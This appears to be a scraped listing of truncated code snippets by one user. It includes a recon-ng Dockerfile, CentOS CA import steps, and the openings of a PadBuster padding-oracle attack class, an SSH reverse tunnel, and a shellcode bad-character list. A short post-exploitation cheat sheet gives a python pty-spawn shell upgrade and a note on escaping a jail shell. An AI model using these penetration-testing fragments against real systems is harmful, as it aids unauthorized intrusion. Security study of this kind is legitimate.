kkirsche

FROM python:2.7
MAINTAINER Kevin Kirsche

RUN apt-get update && apt-get -y dist-upgrade && apt-get -y install git
RUN git clone https://[email protected]/LaNMaSteR53/recon-ng.git && cd recon-ng && pip install -U pip && pip install -r REQUIREMENTS

ENTRYPOINT ["/bin/bash"]

kkirsche

class DictionaryUtility:
    """
    Utility methods for dealing with dictionaries.
    """
    @staticmethod
    def to_object(item):
        """
        Convert a dictionary to an object (recursive).
        """
        def convert(item): 

kkirsche

#!/bin/bash
for file in $(find .)
do 
    if [ -f $file ]; then
        wc -l $file
    fi
done | sort -n

kkirsche

• Open a webpage that uses the CA with Firefox
• Click the lock-icon in the addressbar -> show information -> show certificate
• the certificate viewer will open
• click details and choose the certificate of the certificate-chain, you want to import to CentOS
• click "Export..." and save it as .crt file
• Copy the .crt file to /etc/pki/ca-trust/source/anchors on your CentOS machine
• run update-ca-trust extract
• test it with wget https://thewebsite.org

kkirsche

# -*- coding: utf-8 -*-
from paddingoracle import BadPaddingException, PaddingOracle
from base64 import b64encode, b64decode
from urllib import quote, unquote
import requests
import socket
import time


class PadBuster(PaddingOracle):

kkirsche

/*

Go-Language implementation of an SSH Reverse Tunnel, the equivalent of below SSH command:

   ssh -R 8080:127.0.0.1:8080 operatore@146.148.22.123

which opens a tunnel between the two endpoints and permit to exchange information on this direction:

   server:8080 -----> client:8080

kkirsche

#!/usr/bin/env python

from base64 import b64decode
from urllib import unquote

base64_strs = ['xU5LNJhXeo9B6o4Ri%2FxFHodARXWqgtNufNrYzqG05nGOLNboDgJtkw%3D%3D',
         '%2BjAd73J7RAZgLxAUkIG5l0cMPLQEBAtZRMP3WdXr1%2BMYdrg2cZKaow%3D%3D']

for bstr in base64_strs:
    unquoted_bstr = unquote(bstr)

kkirsche

# We want to make this re-usable if we need it in the future, so let's remove
# the characters only when found, but always keep the full list around
bad_char_list = (
    "\x00\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f"
    "\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f"
    "\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f"
    "\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f"
    "\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f"
    "\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f"

kkirsche

#get a pty through python
python -c 'import pty; pty.spawn("/bin/bash");'

#grab the user agent from the http header on port 10443
tcpdump -A -l -vvvs 1024 -npi eth0 port 10443

#base64 decode a string
echo STRINGTODECODE | base64 --decode

#escape jail shell

kkirsche

<?xml version="1.0" encoding="utf-8" ?>
<otrs_package version="1.1">
	<Name>MyModule</Name>
	<Version>1.0.0</Version>
	<Vendor>My Module</Vendor>
	<URL>http://otrs.org/</URL>
	<License>GNU GENERAL PUBLIC LICENSE Version 2, June 1991</License>
	<ChangeLog Version="1.0.1" Date="2006-11-11 11:11:11">My Module.</ChangeLog>
	<Description Lang="en">MyModule</Description>
	<Framework>5.x.x</Framework>